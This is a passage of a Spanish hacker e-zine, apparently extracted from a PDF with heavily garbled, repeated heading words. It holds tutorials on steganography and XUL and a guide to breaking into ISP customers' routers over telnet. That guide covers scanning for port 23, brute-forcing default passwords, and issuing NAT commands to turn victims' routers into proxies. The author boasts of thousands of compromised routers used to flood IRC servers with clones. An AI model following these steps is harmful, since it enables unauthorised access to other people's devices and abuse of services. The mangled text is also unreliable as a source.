Upload
others
View
0
Download
0
Embed Size (px)
Citation preview
EditorialEditorialEditorial
Editorial
Esta Edición # 1 de la E-zine Level-23 está dirigida a todasaquellas personas que están interesadas en aprender omejorar sus conocimientos en los distintos campos de lainformática como lo son la programación, la criptografía laesteganografia, distintas técnicas de hacking y algunostemas que podrán ver en el desarrollo de esta revista, quesolo pretende exponer estos temas de carácter educativoen ningún momento pretende incitar a llevar acabo delitos,cada persona es lo suficiente consciente de que es bueno yque es malo por lo tanto deben asumir las consecuencias desus actos. Además de nuestros colaboradores de la revistapretenden compartir sus conocimientos con aquellosinteresados en hacerlo.
Agradecemos a todos aquellos participantes de esteproyecto que venimos tratando de hacer desde hace mesesy que fue interrumpido ya todos sabemos las razones y puesdecidimos continuar con este proyecto y hoy estamoscontentos de poder presentarles a ustedes esta edición,fueron muchos los días y noches de esfuerzos por todosaquellos integrantes por eso les agradezco por sucompromiso con level-23.org.
Un agradecimiento especial a todos aquellos usuarios dewww.level-23.com quienes han estado esperandoansiosamente esta ebook, por su paciencia y fidelidad conel sitio.
AtentamenteAtentamenteAtentamente
Atentamente
C4x30xC4x30xC4x30x
C4x30x
---
-
DirectorDirectorDirector
Director
E-zineE-zineE-zine
E-zine
Level-23Level-23Level-23
Level-23
CONTENIDOCONTENIDOCONTENIDO
CONTENIDO
***
*
ManualManualManual
Manual
EsteganografEsteganografEsteganograf
Esteganograf
ííí
í
aaa
a
***
*
ManualManualManual
Manual
xulxulxul
xul
***
*
IntrusionIntrusionIntrusion
Intrusion
aaa
a
ununun
un
RouterRouterRouter
Router
MedianteMedianteMediante
Mediante
TelnetTelnetTelnet
Telnet
***
*
InstalarInstalarInstalar
Instalar
UbuntuStudioUbuntuStudioUbuntuStudio
UbuntuStudio
***
*
TelnetTelnetTelnet
Telnet
yyy
y
sshsshssh
ssh
***
*
XSSXSSXSS
XSS
TUNELINGTUNELINGTUNELING
TUNELING
***
*
IntroducciIntroducciIntroducci
Introducci
óóó
ó
nnn
n
aaa
a
XSSXSSXSS
XSS
***
*
CursoCursoCurso
Curso
BBB
B
ááá
á
sicosicosico
sico
dedede
de
ProgramaciProgramaciProgramaci
Programaci
óóó
ó
nnn
n
enenen
en
HTMLHTMLHTML
HTML
yyy
y
CSSCSSCSS
CSS
***
*
ManualManualManual
Manual
InyeccionInyeccionInyeccion
Inyeccion
SqlSqlSql
Sql
***
*
ArquitecturaArquitecturaArquitectura
Arquitectura
dedede
de
ComputadoresComputadoresComputadores
Computadores
***
*
ManualManualManual
Manual
PhiserPhiserPhiser
Phiser
RapidshareRapidshareRapidshare
Rapidshare
200920092009
2009
***
*
ManualManualManual
Manual
PhiserPhiserPhiser
Phiser
MegauploadMegauploadMegaupload
Megaupload
200920092009
2009
EsteganografEsteganografEsteganograf
Esteganograf
ííí
í
aaa
a
Para comenzar debemos de saber el significado de esta técnica
LaLaLa
La
EsteganografEsteganografEsteganograf
Esteganograf
ííí
í
a.-a.-a.-
a.-
o empleo de canales subliminales proviene del griego.steganos(secreto) y grafía (escribir). Y su definición es: “La escritura secreta”
Antes de continuar explicándoles como funciona esta técnica también debemosde conocer la siguiente:
CriptografCriptografCriptograf
Criptograf
ííí
í
a.-a.-a.-
a.-
el arte de ocultar. La palabra tiene su origen en el griego. kryptos(oculto, escondido) y graphein (escribir). Y su definición es: “Arte de escribircon clave secreta o de un modo enigmático”
Gracias a esta ciencia o artes aprenderemos a ocultar nuestros mensajes de lavista de otras personas. cabe señalar que mucha gente cofunde laEsteganografEsteganografEsteganograf
Esteganograf
ííí
í
aaa
a
con la CriptografCriptografCriptograf
Criptograf
ííí
í
aaa
a
por su parecido en cuanto al objetivo finalpero debemos de ser capaces de distinguirlas muy fácilmente debido a que elobjetivo de la criptografía no es de ocultar el mensaje sino mas bien mediantesus algoritmos de encriptación hacerla ilegible a las personas.
En muchas ocasiones es necesario juntar estas dos técnicas para tener unresultado óptimo ya que si nuestro mensaje es interceptado sin la clave deencriptación no podrán hacer nada y nuestra información permanecerá segura.
Una mención especial merece el uso de la Esteganografía para exportarinformación sin violar las leyes restrictivas que, con respecto a la Criptografíafuerte, existen en algunos países. Un ejemplo seria enviar un mensaje con textoclaro, pero entremezclado con cantidades ingentes de basura. El destinatarioempleara técnicas esteganograficas para separar la información útil del resto.Esta técnica se conoce como chaffingchaffingchaffing
chaffing
andandand
and
winnowingwinnowingwinnowing
winnowing
, que vendría a traducirsecomo llenar de paja y separar el grano de la paja.
Este sistema surgió en marzo de 1998, propuesto por Ronald L. Rivest uno delos creadores de RSA, como desafió a la política restrictiva del Gobierno de losEE.UU. con respecto a la Criptografía. No deja de ser en cierto modo unacuriosidad, debido a lo enormemente grandes que son los mensajes encomparación con la cantidad de texto útil que se puede incluir en ellos.
Continuando con nuestra técnica supongamos que queremos enviar un mensajesecreto a un amigo y no queremos que nadie sospeche que se le esta enviandomas información de lo que a simple vista se observa.
En realidad existen infinidad de métodos que se encuentran limitados solo por laimaginación de cada uno.
En este caso podríamos enviarle una imagen y dentro de la imagen colocarnuestro mensaje, a simple vista todos observaran la imagen pero ignoraran quedentro de ella se encuentra nuestra información secreta, ahora asumiendo queuna persona externa conociera el método empleado para camuflar nuestromensaje, ahí nuestra información estaría corriendo un grave riesgo ytendríamos que utilizar la criptografía para proteger nuestra información peropodemos utilizar la siguiente técnica chaffingchaffingchaffing
chaffing
andandand
and
winnowingwinnowingwinnowing
winnowing
para mandarmuestro mensaje original entremezclado con la basura que hayamos llenado ysolo quien disponga de la clave estaría en condiciones de recuperar el mensajeoriginal
Creo que ya es suficiente teoría para entender bien la Esteganografía y sudiferencia notoria o claramente distinguida con la criptografía, ya solo nosqueda ir ahora a la practica entonces manos a la obra
Ahora lo que haré es introducir un mensaje dentro de una imagen de esa formatodos verán la imagen y no sospecharan de la información adicional que hay,para ello necesitare tener 3 archivos que los tendremos dentro una mismacarpeta:
Imagen.jpg : pantalla que utilizaremos para ocultar nuestra informacionMensaje.txt : información que vamos a ocultar “este es un ejemplo deesteganografia”Separador.txt : separador para encontrar nuestro mensaje “AB--//ba”Ahora debemos de abrir el cmd para hacer esto debemos presionar la teclawindous + R y escribiremos cmd, ahora nos ubicamos en la carpeta quecontiene nuestros archivos y escribimos lo siguiente dentro de nuestra consolaque hemos abierto y presionamos enter
Lo que estamos haciendo es copiar de forma binaria (copy /b) nuestro mensajea la imagen
Ahora ejecutamos nuestro editor hexadecimal en mi caso utilizare HexWorkshop y abrimos nuestra imagen y buscamos el contenido de nuestroseparador “AB--//ba”
Una vez encontrado nuestro texto separador vemos nuestro mensaje secretoque en este caso es “este es un ejemplo de esteganografia”.
En este ejemplo introduje nuestro mensaje al final de los datos de la imagenpero aun así este mensaje es muy fácil de interceptar lo ideal hubiese sidohaber introducido fragmentos de nuestro mensaje con nuestro separador yhaber introducido mas información (spam) haciendo uso de la técnica chaffingchaffingchaffing
chaffing
andandand
and
winnowingwinnowingwinnowing
winnowing
antes mencionada pero siempre se debe de empezar conejemplos básicos y simples para después seguir con los mas complejos
También se pudo usar la criptografía para hacer ilegible nuestro mensaje eso yaes a cuenta de la imaginación y el grado de seguridad que le quieran dar.
Bueno con esto me despido y espero haberles ayudado a comprender el uso deesta técnica y diferenciarla de la criptografía
Propiedad de www.level-23.com
AutorAutorAutor
Autor
:::
:
ShevchenkoShevchenkoShevchenko
Shevchenko
ManualManualManual
Manual
XulXulXul
Xul
Hola a todos soy Shevchenko y pertenezco a la comunidad level-23 este es miprimer manual sobre XULXULXUL
XUL
y también la primera entrega comenzarerespondiéndoles ¿Qué es XUL?
XUL es un lenguaje basado en XMLXMLXML
XML
para el desarrollo de interfaces de usuariomultiplataforma del que se dice será la pesadilla de .NET de Microsoft. Sunombre deriva de las siglas de XML-basedXML-basedXML-based
XML-based
User-interfaceUser-interfaceUser-interface
User-interface
LanguageLanguageLanguage
Language
y fuecreado por la gente del proyecto Mozilla apoyándose en su motor derenderizado, Gecko, que se encarga tanto del visualizado de webs como de laconstrucción de la interfaz de usuario.
En esta entrega hablare un poco sobre la creación de archivos XULXULXUL
XUL
y loselementos básicos que podemos añadirle.
La estructura de un archivo XUL es bastante simple y fácil. Solo necesitamos uneditor de texto en Windows (Block de notas, etc.) y en Linux (Gedit, Kwrite, etc.).Para poder visualizar nuestros archivos en XUL debemos de tener instalado unnavegador web con motor gecko yo les recomiendo que usen Firefox y creo queno hace falta decir que IE no sirve.
No nos olvidemos que debemos de guardar el archivo con extensión “.xul”.
<?xml version="1.0"?><?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
<windowid="ventana"title="Ejemplo XUL"orient="horizontal"
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">...</window>
Esta ventana no hace nada, ya que no contiene ningún elemento.
1.1.1.
1.
<?xml<?xml<?xml
<?xml
version="1.0"?>version="1.0"?>version="1.0"?>
version="1.0"?>
Esta línea declara simplemente que se trata de un archivo XML.
2.2.2.
2.
<?xml-stylesheet<?xml-stylesheet<?xml-stylesheet
<?xml-stylesheet
href="chrome://global/skin/"href="chrome://global/skin/"href="chrome://global/skin/"
href="chrome://global/skin/"
type="text/css"?>type="text/css"?>type="text/css"?>
type="text/css"?>
Esta línea se utiliza para especificar las hojas de estilo que va a utilizar para elarchivo. Puede incorporar mas líneas haciendo referencia a su hoja de estilo
3.3.3.
3.
<window<window<window
<window
Esta línea crea la interfaz de XulXulXul
Xul
yyy
y
es similar al body de html
4.4.4.
4.
id="ventana"id="ventana"id="ventana"
id="ventana"
El atributo id se utiliza como un identificador para que la ventana puede sercontemplado por los scripts.
5.5.5.
5.
title="Ejemplotitle="Ejemplotitle="Ejemplo
title="Ejemplo
XUL"XUL"XUL"
XUL"
El título describe el atributo de texto que aparece en la barra de título de laventana cuando se muestra. En este caso, el texto aparecerá "Ejemplo XUL".
6.6.6.
6.
orient="horizontal"orient="horizontal"orient="horizontal"
orient="horizontal"
Especifica como estará la disposición de los elementos en la ventana.
7.xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">7.xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">7.xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
7.xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
Esta línea declara el nombre para XUL, lo que se debería poner en la ventana deelemento que indique que todos sus hijos son XUL. Mozilla va a reconocer estaURL internamente.
8.8.8.
8.
.........
...
Aquí es donde los elementos (botones, menús y otros componentes de interfazde usuario).
9.9.9.
9.
</window></window></window>
</window>
Y, por último, tenemos que cerrar la ventana etiqueta al final del archivo.
Ahora que ya conocemos lo elemental de un archivo XUL vamos a añadirlealgunos elementos
AAA
A
ñññ
ñ
adiendoadiendoadiendo
adiendo
ununun
un
botbotbot
bot
óóó
ó
nnn
n
EtiquetaEtiquetaEtiqueta
Etiqueta
<button><button><button>
<button>
<button<button<button
<button
ididid
id
="boton"="boton"="boton"
="boton"
classclassclass
class
="dialog"="dialog"="dialog"
="dialog"
labellabellabel
label
="OK"="OK"="OK"
="OK"
imageimageimage
image
="image.jpg"="image.jpg"="image.jpg"
="image.jpg"
disableddisableddisabled
disabled
="true"="true"="true"
="true"
accesskeyaccesskeyaccesskey
accesskey
="t"="t"="t"
="t"
/>/>/>
/>
Los atributos son los siguientes, todos los cuales son opcionales:
Id:Id:Id:
Id:
Un identificador único para el botón. Verá este atributo en todos loselementos.
Class:Class:Class:
Class:
Identificador de clase para el botón. Esto funciona igual que en HTML y lopodemos utilizar para cambiarle atributos con hojas de estilo (CSS).
Label:Label:Label:
Label:
El nombre que aparecerá en el botón es como el value en HTML. Porejemplo, Aceptar o Cancelar.
Image:Image:Image:
Image:
La URL de la imagen para que aparezca en el botón. Los botones en si noson muy agradables visualmente por eso existe este atributo que funciona igualque en HTML
Disabled:Disabled:Disabled:
Disabled:
Solo existen dos estados (“True” y “False”), trae el botón estahabilitado y false desactivado o deshabilitado
Accesskey:Accesskey:Accesskey:
Accesskey:
Tecla de acceso rápido se presiona ALT + la letra subrayada. En elejemplo se coloco la letra t y como esta letra no esta en el label (etiqueta) delbotón aparece entre paréntesis la letra que pusimos. Ahora colocando la letra“o” y el botón habilitado se visualiza asi:
AAA
A
ñññ
ñ
adiendoadiendoadiendo
adiendo
textotextotexto
texto
EtiquetaEtiquetaEtiqueta
Etiqueta
<label><label><label>
<label>
La forma más básica para incluir texto en una ventana es utilizar la etiquetalabel.
<label value="Bienvenidos a Level-23"/>Ejemplo sin value<label>Bienvenidos a Level-23</label>
La etiqueta label también posee el atributo class para poder editarlo medianteCSS y mejorar su estilo.
AAA
A
ñññ
ñ
adiendoadiendoadiendo
adiendo
imimim
im
ááá
á
genesgenesgenes
genes
EtiquetaEtiquetaEtiqueta
Etiqueta
<Image><Image><Image>
<Image>
Al igual que HTML, XUL tiene un elemento para mostrar imágenes dentro de unaventana. Puede utilizar el atributo src para especificar la URL del archivo deimagen. El ejemplo siguiente muestra esto:<image src="banner.jpg"/>Su funcionamiento es igual que <img> en HTML
AAA
A
ñññ
ñ
adiendoadiendoadiendo
adiendo
cuadrocuadrocuadro
cuadro
dedede
de
textotextotexto
texto
EtiquetaEtiquetaEtiqueta
Etiqueta
<textbox><textbox><textbox>
<textbox>
HTML tiene un elemento de entrada que pueden ser utilizados para los controlesde entrada de texto. XUL tiene un elemento similar, de texto, utilizadas para elmismo proposito. Sin ningún atributo, el elemento de texto crea un cuadro en elque el usuario puede introducir texto. Esta etiqueta tambien posee los mismosatributos como los controles de entrada HTML. Las siguientes son algunas deellas:
Type:Type:Type:
Type:
Esto normalmente se usa para introducir contraseñas.
MaxlengthMaxlengthMaxlength
Maxlength
: El número máximo de caracteres que permite el cuadro de texto.
<textbox id="txtIngreso" width="250px" height="25px"> </textbox>
Ahora veamos un ejemplo con lo que hemos aprendido hasta ahora
<box><vbox><hbox><label value="Ingrese Texto" flex="1"/>
<textbox id="texto-ingresado"/></hbox><hbox><label value="Ingrese Password" flex="1"/><textbox id="pass-ingresado" type="password" maxlength="8"/></hbox></vbox></box>
Desde ahora dejo un poco el discurso y empezamos más con los ejemplos quees la mejor forma de aprender
<textbox<textbox<textbox
<textbox
multiline="true"multiline="true"multiline="true"
multiline="true"
value="Envalue="Envalue="En
value="En
estaestaesta
esta
cajacajacaja
caja
dedede
de
textotextotexto
texto
sesese
se
podrapodrapodra
podra
escribirescribirescribir
escribir
variasvariasvarias
varias
lineas."/>lineas."/>lineas."/>
lineas."/>
CheckboxCheckboxCheckbox
Checkbox
yyy
y
RadioRadioRadio
Radio
ButtonsButtonsButtons
Buttons
EtiquetaEtiquetaEtiqueta
Etiqueta
<checkbox><checkbox><checkbox>
<checkbox>
yyy
y
EtiquetaEtiquetaEtiqueta
Etiqueta
<radiogroup><radiogroup><radiogroup>
<radiogroup>
Dos elementos adicionales que se utilizan para la creación de casillas deverificación y botones de selección. Se utiliza para las opciones que puede seractivado o desactivado.
El ejemplo siguiente muestra algunas sencillas casillas de verificación y botonesde radio.
<checkbox id="chkbox1" checked="true" label="Seleccionado"/><checkbox id="chkbox2" checked="false" label="No seleccionado"/>
<radiogroup><radio id="Rojo" label="Rojo"/><radio id="Verde" selected="true" label=" Verde "/><radio id="Azul" label=" Azul "/>
</radiogroup>
ListListList
List
ControlsControlsControls
Controls
EtiquetaEtiquetaEtiqueta
Etiqueta
<listbox><listbox><listbox>
<listbox>
Un cuadro de lista se utiliza para mostrar una serie de elementos. El usuariopuede seleccionar un elemento de la lista.
XUL proporciona dos tipos de elementos para crear listas, una lista para crearmúltiples hileras, y un elemento menulist para crear la lista desplegable cajas.Ellos funcionan de manera similar al HTML, pero los elementos XUL tienencaracterísticas adicionales.
Por ejemplo, este cuadro de lista tendrá cuatro filas, una para cada tema.
<listbox><listitem label="Opera"/><listitem label="Firefox"/><listitem label="Chrome"/><listitem label="IE"/>
</listbox>
Multi-ColumnMulti-ColumnMulti-Column
Multi-Column
ListListList
List
BoxesBoxesBoxes
Boxes
La lista también soporta múltiples columnas. Cada celda puede tener contenidodentro de ella.
Dos etiquetas se utilizan para especificar las columnas en la lista. El elementolistcols se utiliza para la columna de información, cada una de las cuales seespecifica mediante un elemento listcol. Usted necesitará un elemento listcolpara cada columna en la lista.
El listcell elemento puede ser utilizado para cada celda en una fila. Si deseatener tres columnas, usted tendrá que agregar tres elementos listcell dentro decada ListItem. Para especificar el contenido de texto de una celda, coloque unaetiqueta en un atributo listcell. Por el simple caso de que sólo hay una columna,también puede colocar la etiqueta de atributos directamente en el elementoListItem y dejar el listcell a cabo por completo, como se vio en la anterior lista deejemplos.
El ejemplo siguiente es de una lista con dos columnas y tres filas:
<listbox><listcols><listcol/><listcol/>
</listcols><listitem><listcell label="Rosario"/><listcell label="22 años"/>
</listitem><listitem><listcell label="Jennifer"/><listcell label="23 años"/>
</listitem><listitem><listcell label="Alejandra"/><listcell label="21 años"/>
</listitem></listbox>
HeaderHeaderHeader
Header
RowsRowsRows
Rows
También permiten una línea de encabezamiento. Esto es mucho como una línearegular, salvo que se muestra diferente. Usted podría utilizar esto para crearcabeceras de columna. Dos nuevos elementos que se utilizan.
El elemento listheader se utiliza para cada celda en la fila de títulos.
Aquí está el ejemplo anterior con una línea de encabezamiento:
<listbox><listhead><listheader label="Nombre"/><listheader label="Ocupación"/>
</listhead>
<listcols><listcol/><listcol flex="1"/>
</listcols><listitem><listcell label="Rosario"/><listcell label="Mi novia"/>
</listitem><listitem><listcell label="Jennifer"/><listcell label="Estudiante"/>
</listitem><listitem><listcell label="Alejandra"/><listcell label="Sistemas"/>
</listitem></listbox>
Comenzamos ahora con la practica realizando una calculadora, pero xul solosirve para hacer el interface (pantallazo) por eso usaremos javascriptjavascriptjavascript
javascript
pararealizar las operaciones.
Copien el código en un block de notas y guárdenlo pero no se olviden que debede tener extensión .xul.xul.xul
.xul
Calculadora.xulCalculadora.xulCalculadora.xul
Calculadora.xul
<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet href="chrome://global/skin" type="text/css"?><?xml-stylesheet href="estilo.css" type="text/css"?>
<window id="calculadora"title="Calculadora"xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="funcion.js"/>
<box flex="1" id="fondo" pack="center" style="overflow:auto;"><hbox><vbox pack="center"><groupbox><groupbox align="center" pack="center" ><separator style="height:5px"/><label value=" CALCULADORA " style="font-family:Arial; -moz-border-radius:8px;font-weight:bold;background-color:#000000;color:#DB974D;font-size:12px;padding:6px;border-top: 5px solid #BFBFBF; border-left: 5px solid#BFBFBF; border-bottom: 5px solid #BFBFBF;border-right: 5px solid#BFBFBF;"/><separator style="height:5px"/></groupbox><groupbox align="right"><hbox>
<label id='texto' flex='1' value='0' align="right" style='font-size:24px;color:#fff;font-weight:bold;'/></hbox></groupbox><groupbox><hbox><vbox align='center'><label id='memoria' value='' style='height:26px;color:#fff;font-weight:bold;'/><button id='texto' label='MC' style='width:50px;color:#f00'oncommand="delMemoria()"/><button id='texto' label='MR' style='width:50px;color:#f00'oncommand="impMemoria()"/><button id='texto' label='MS' style='width:50px;color:#f00'oncommand="guardaMem()"/><button id='texto' label='M+' style='width:50px;color:#f00'oncommand="guardaMem()"/></vbox><vbox><hbox><button id='retro' label='Retroceso' flex='1' style='color:#f00'oncommand="retro()"/><button id='limpiar' label='CE' flex='1' style='color:#f00'oncommand="limpiarTodo()"/><button id='limpia' label='C' flex='1' style='color:#f00' oncommand="limpiar()"/></hbox><hbox><button id='7' label='7' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='8' label='8' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='9' label='9' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='div' label='/' style='width:30px;color:#f00'oncommand="opera(this.label)"/><button id='raiz' label='sqrt' style='width:30px;color:#00f'oncommand="raiz(this.label)"/></hbox><hbox><button id='4' label='4' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='5' label='5' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='6' label='6' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='mul' label='*' style='width:30px;color:#f00'oncommand="opera(this.label)"/>
<button id='por' label='%' style='width:30px;color:#00f'oncommand="porcentaje()"/></hbox><hbox><button id='1' label='1' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='2' label='2' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='3' label='3' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='men' label='-' style='width:30px;color:#f00'oncommand="opera(this.label)"/><button id='ter' label='1/x' style='width:30px;color:#00f'oncommand="fraccion()"/></hbox><hbox><button id='0' label='0' style='width:30px;color:#00f'oncommand="imprimir(this.label);"/><button id='signo' label='+/-' style='width:30px;color:#00f'oncommand="cambiaSigno(this.label)"/><button id='punto' label='.' style='width:30px;color:#00f'oncommand="impPunto(this.label)"/><button id='mas' label='+' style='width:30px;color:#f00'oncommand="opera(this.label)"/><button id='igual' label='=' style='width:30px;color:#f00' oncommand="igual()"/></hbox></vbox></hbox></groupbox></groupbox></vbox></hbox></box></window>
Solo explicare las nuevas etiquetas utilizadas y atributos importantes.Recuerden que XulXulXul
Xul
esta basado en XML y si se abre una etiqueta debes decerrarla, existen 2 formas de cerrar una etiqueta abierta:
FormaFormaForma
Forma
cortacortacorta
corta
<etiqueta />
FormaFormaForma
Forma
largalargalarga
larga
<etiqueta> <etiqueta/>
XulXulXul
Xul
también permite utilizar las hojas de estilo (CSS) y para usarlas debemos deincorporar la siguiente línea de código donde href ira la ruta de nuestra hoja deestilo
<?xml-stylesheet href="estilo.css" type="text/css"?>
Como dije antes xulxulxul
xul
solo es la pantalla que visualizamos y si queremos realizaralgún proyecto debemos de utilizar javascript
<script src="funcion.js"/>
En xul también existen los contenedores con lo que podemos ordenar losbotones de manera horizontal (hbox) y vertical (vbox)
Es el contenedor principal su uso es opcional<box flex="1" id="fondo" pack="center" style="overflow:auto;">
<hbox> todos los elementos que coloquemos dentro de esta etiqueta seordenaran en forma horizontal </hbox>
<vbox pack="center"> en este caso se ordenaran en forma vertical y por elatributo colocado estará de forma centrada a la ventana </vbox>
<groupbox> este contenedor muestra un contorno donde podemos ver queelementos tiene agrupado y también nos permite asignarle un titulo visible</groupbox>
Para usar una función de javascript en xul haremos uso de la etiqueta button yde sus eventos: oncommand, onclick, etc.
<button id='mas' oncommand="opera(this.label)"/>
Para referenciar un objeto de xul en javascript usamosdocument.getElementByIddocument.getElementByIddocument.getElementById
document.getElementById
donde hacemos referencia por su ID ('Id-xul')'Id-xul')'Id-xul')
'Id-xul')
seguido de la propiedad del mismo que puede ser: label, value, hidden, etc.,ejemplo:
document.getElementById('Id-xul').valuedocument.getElementById('Id-xul').valuedocument.getElementById('Id-xul').value
document.getElementById('Id-xul').value
Les voy a dejar todo el ejemplo para que lo puedan descargar y probar
P.D.:P.D.:P.D.:
P.D.:
No se por que siempre que alguien te enseña un nuevo lenguaje siempreacabas realizando una calculadora XD
En nuestra segunda parte profundizaremos más sobre el uso de los elementos,además crearemos una conexión con PHP
Espero que esta primera entrega haya despertado en ustedes vuestracuriosidad e interés de aprender XUL
Si te interesa conocer mas sobre XUL puede visitar www.xulplanet.com o serparte de nuestra comunidad www.level-23.com registrándote a nuestro foro.
Propiedad de www.level-23.com
AutorAutorAutor
Autor
:::
:
ShevchenkoShevchenkoShevchenko
Shevchenko
IntrusiIntrusiIntrusi
Intrusi
óóó
ó
nnn
n
aaa
a
ununun
un
routerrouterrouter
router
mediantemediantemediante
mediante
telnettelnettelnet
telnet
Índice
1.1.1.
1.
IntroducciIntroducciIntroducci
Introducci
óóó
ó
nnn
n
2.2.2.
2.
LoLoLo
Lo
quequeque
que
necesitaremosnecesitaremosnecesitaremos
necesitaremos
3.3.3.
3.
UnUnUn
Un
pocopocopoco
poco
dedede
de
teorteorteor
teor
ííí
í
aaa
a
4.4.4.
4.
UnUnUn
Un
EjemploEjemploEjemplo
Ejemplo
PracticoPracticoPractico
Practico
RealRealReal
Real
1.1.1.
1.
INTRODUCCIINTRODUCCIINTRODUCCI
INTRODUCCI
ÒÒÒ
Ò
NNN
N
Hace ya unos años en la compañía “telefteleftelef
telef
óóó
ó
nicanicanica
nica
” tuvieron la brillante idea de dejar elpuerto 23 abierto en los routers que regalaban cuando contratabas sus servicios deInternet para así si les surgía algún problema con la configuración de ese router notener que desplazarse para repararlo y poder hacerlo conectándose al router mediantetelnet, teniendo en cuenta esto y que muchos de los usuarios de esos routers bien pordesconocimiento o por simple dejadez no cambian el usuario y contraseña que elrouter trae por defecto, con esto nos encontramos que lo mismo que los de “telefteleftelef
telef
óóó
ó
nicanicanica
nica
”pueden entrar a esos routers nosotros también ; )
2.2.2.
2.
LOLOLO
LO
QUEQUEQUE
QUE
NECESITAMOSNECESITAMOSNECESITAMOS
NECESITAMOS
Necesitaremos saber las ip´s vulnerables, que tipo de router utilizan y el usuario y lacontraseña para poder conseguir entrar en ellos.
Lo primero es escanear rangos de ip´s de esta compañía buscando las quetengan el puerto 23 abierto, esto lo podemos hacer con el programa ipscanipscanipscan
ipscan
descargar desde aquí http://www.megaupload.com/es/?d=OFR8N450 , Losegundo es saber que tipo de routers colocaban por aquellas fechas (eso ya oslo digo yo, se llamaban 3com3com3com
3com
). En tercer lugar necesitaremos saber cuales sonlos usuarios y contraseñas que utilizan esos routers por defecto, podéis veralgunas desde este sitio web: http://www.newbie.cl/nb/2008/08/11/contrasena-por-defecto/ Y por ultimo necesitaremos un programa que sea ágil probando enesas ip´s los usuarios y contraseñas para saber en cuales
podemos entrar, existen varios programas de brute force con los que podéis hacer esto,el brutusbrutusbrutus
brutus
seria una buena elección, descárgalo desde aquíhttp://www.megaupload.com/es/?d=4GTZNN1Z . Creo que con todo esto no tengáisproblema para conseguir una buena lista de ip´s con sus user y pass (os puedo decirque yo tengo miles que a día de hoy funcionan)
3.3.3.
3.
UNUNUN
UN
POCOPOCOPOCO
POCO
DEDEDE
DE
TEORIATEORIATEORIA
TEORIA
Una vez tengamos alguna ip con su respectivo usuario y contraseña es cuestiónde ir a inicio/ejecutar y ponemos telnet ip ejemplo: telnertelnertelner
telner
125.125.125.00125.125.125.00125.125.125.00
125.125.125.00
y ledamos a aceptar, con esto se nos abrirá la consola y lo primero nos pedirá elusuario, lo ponemos y pulsamos enter, después nos medirá la contraseña, laescribimos (ojo que no se vera lo que estamos poniendo) pero lo escribimos detodas formas y le damos a enter, si todo salio bien nos dará la bienvenida y yaestaremos dentro del router si tecleamos el comando helphelphelp
help
nos listara loscomandos disponibles, podemos seguir navegando dentro de las opciones delrouter através del comando help ejemplo: helphelphelp
help
ADDADDADD
ADD
que
es el primer comando que aparece en la lista.
Apartir de aquí es cosa de cada uno la intención que tenga de lo que quiere hacerdentro.
4.4.4.
4.
UNUNUN
UN
EJEMPLOEJEMPLOEJEMPLO
EJEMPLO
PRACTICOPRACTICOPRACTICO
PRACTICO
REALREALREAL
REAL
Bueno, vamos a intentar mapear un puerto dentro de este router para redirigirlo a unservidor de IRC y así ocultar nuestra ip conectándonos através de el.
Primero abrimos una conexión de Telnet en la consola con la ip, en este caso con80.32.109.7380.32.109.7380.32.109.73
80.32.109.73
y nos logueamos (todo esto como vimos en el punto 3) una vez hecho estointentaremos redirigirle el puerto 555555555555
5555
en dirección al servidor de IRC para elloutilizaremos los siguientes comandos. (Lo resaltado en gris son los comandos aintroducir)
Mandamos un comando de preaviso al router de lo que queremos hacer:
enable ip wan_to_wan_forwarding
Después mandamos el comando con los datos de lo que queremos:
add nat tcp vc internet public_port 5555 private_port 6667 private_address 149.9.1.16
Si nos fijamos en el comando anterior el 555555555555
5555
es el puerto que vamos a abrir en elrouter y 149.9.1.16149.9.1.16149.9.1.16
149.9.1.16
666766676667
6667
son la ip y puerto a donde queremos que señale (estadirección y puerto apuntan a dalnet).
Una vez introducido el comando anterior nos pedirá que salvemos los cambios,tecleamos lo siguiente:
save all
Y para que surjan efecto los cambios debemos rebotear el router:
reboot
Nos pedirá confirmación para esto:
Yes
Esperamos unos segundos, salimos de la consola y ya tenemos el puerto 5555 de esterouter apuntando a un servidor de IRC.
Vista de lo hecho asta ahora:
Con esto abrimos nuestro MIRC y ponemos:
/server 80.32.109.73 5555
Y nos conectaremos al servidor de IRC.
Bueno pues ya tenemos todo hecho nos hemos fabricado un Proxy para conectarnos alIRC con una ip distinta a la nuestra y así poder permanecer en el anonimato, muestrouna captura:
En la imagen vemos como el nick de arriba aparece con mi ip real, en cambio el nick deabajo también soy yo pero conectándome através del router al que terminamos demapear el puerto, y os preguntareis tanto trabajo
para tan solo ocultar nuestra ip en el IRC, pues os explico, en la mayoría de seservidores de IRC no se permite la entrada de mas de dos o tres nicks por ip, con locual mediante este proceso podemos saltarnos esta norma, imaginen que metemos 100,no 1000, saben lo que se podría hacer con tal numero de conexiones, se podría tumbar
el servidor entero.
Yo personalmente me programe en mircscripting un clonador con el cual conseguíameter más de mil de estas ip´s en el IRC, una capturita:
Esto es solo una de las utilidades que se les puede dar a estos routers, pero quien sabe,se podría intentar conectarlos a una web o quizás se podría sacar algún beneficio con
ellos, nunca me pare a pensarlo….
AutorAutorAutor
Autor
:::
:
StopStopStop
Stop
InstalarInstalarInstalar
Instalar
UbuntuStudioUbuntuStudioUbuntuStudio
UbuntuStudio
En este manual les mostraremos como instalar UbuntuStudio en Ubuntu desdelos repositorios sin afectar a Windows.
Para este manual no necesitamos tener los conocimientos de particiones dedisco duro, también sirve para todos esas personas que no tengan unidad deDVD en su computadora.
¿Cual Ubuntu es correcto para nuestra computadora?
